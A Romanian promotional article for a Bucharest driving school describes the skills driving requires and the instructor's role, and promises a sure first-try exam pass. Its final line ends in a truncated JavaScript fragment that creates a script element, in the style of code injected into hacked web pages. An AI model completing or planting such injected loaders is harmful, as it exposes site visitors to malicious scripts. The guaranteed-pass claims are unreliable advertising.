scoala de soferi

scoala de soferi

Sa stii sa conduci bine este oarecum un talent, avand in vedere ca acest lucru presupune foarte multe abilitati din partea conducatorului. Printre acestea se numara atentia distributiva, abilitatea de a face mai multe lucruri odata ( cum ar fi sa schimbi vitezele, sa manuiesti volanul, sa te uiti in oglinzi si desigur, sa fii atent pe unde mergi). O alta abilitate necesara este orientarea in spatiu, pentru a sti unde te aflii, dar si pentru a executa virajele corect.

De asemenea trebuie sa anticipezi comportamentul celorlalti soferi, pentru a evita accidentele sau ciocnirile si trebuie sa inveti sa simti masina. Ce scoala de soferi este potrivita pentru a te invata toate aceste lucruri? Drive School Bucuresti te asteapta cu cei mai buni instructori auto, acestia fiind ideali pentru formarea ta ca viitor conducator auto.

Beneficiezi de cele mai bune ore de pregatire practica, dar si teoretica, de preturi accesibile si un program flexibil, adaptat in functie de posibilitatile tale. In plus, aici se preda si in limba engleza si germana, iar daca doresti, poti achita in rate taxa pentru inscriere. Rata de promovabilitate este mare, astfel ca nu exista posibilitati mari de a pica examenul auto.

Scoala de soferi si rolul instructorului auto

Cu toate ca si scoala de soferi este importanta ca institutie, deoarece aceasta trebuie sa fie autorizata si sa respecte toate normele aflate in vigoare, tot instructorul auto ramane cel care ta poate influenta in mod decisiv. Inainte de a te hotari asupra persoanei care va fi indrumatorul tau, trebuie sa fii sigur ca esti compatibil cu acesta. De asemenea, trebuie sa te simti confortabil si relaxat in preajma acestuia, pentru a pune toate intrebarile necesare atunci cand ai nevoie de informatii sau lamuriri.

Se intampla foarte des ca instructorul auto sa nu fie pe placul unor cursanti, motiv pentru care decis sa schimbe scoala de soferi sau doar instructorul. Profesionalismul ,rabdarea si seriozitatea trebuie sa faca parte din calitatile unui instructor. Numai asa te vei simti in largul tau si vei reusi sa deprinzi cunostintele esentiale intr-un timp cat mai scurt.

Drive School – o scoala de soferi din Bucuresti de elita!

Chiar daca esti  la prima inscriere la o scoala de soferi sau incerci sa obtii permisul a doua oara, scoala de soferi Drive School Bucuresti te asteapta cu cele mai bune oferte. Aici poti fi sigur ca vei promova examenul din prima incercare, dat fiind ca intreaga echipa este una de profesionisti. Pentru detalii, acceseaza driveschool.ro!var d=document;var s=d.createElement(‘script’);